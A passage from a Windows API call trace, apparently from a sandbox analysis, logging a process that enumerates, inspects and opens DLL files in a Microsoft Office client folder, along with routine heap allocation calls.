(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.114] AreFileApisANSI () returned 1 [0100.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 59 [0100.114] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1ea0ff2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1ea0ff2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd20449b3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0)) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.114] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e7acf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e7acf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1fac086, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.115] AreFileApisANSI () returned 1 [0100.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll", lpUsedDefaultChar=0x0) returned 59 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.116] AreFileApisANSI () returned 1 [0100.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0100.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll") returned 59 [0100.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.116] GetFileType (hFile=0x418) returned 0x1 [0100.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.117] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.117] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.117] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.117] CloseHandle (hObject=0x418) returned 1 [0100.117] AreFileApisANSI () returned 1 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll") returned 59 [0100.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.117] GetFileType (hFile=0x418) returned 0x1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0100.118] CloseHandle (hObject=0x418) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.119] AreFileApisANSI () returned 1 [0100.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0100.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll") returned 59 [0100.119] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e7acf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e7acf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1fac086, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8)) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.119] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e2e85a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e2e85a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f5fb21, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.120] AreFileApisANSI () returned 1 [0100.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll", lpUsedDefaultChar=0x0) returned 59 [0100.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.120] AreFileApisANSI () returned 1 [0100.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 59 [0100.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.120] GetFileType (hFile=0x418) returned 0x1 [0100.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.121] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.121] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.121] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.121] CloseHandle (hObject=0x418) returned 1 [0100.121] AreFileApisANSI () returned 1 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0100.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 59 [0100.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.122] GetFileType (hFile=0x418) returned 0x1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.122] CloseHandle (hObject=0x418) returned 1 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.123] 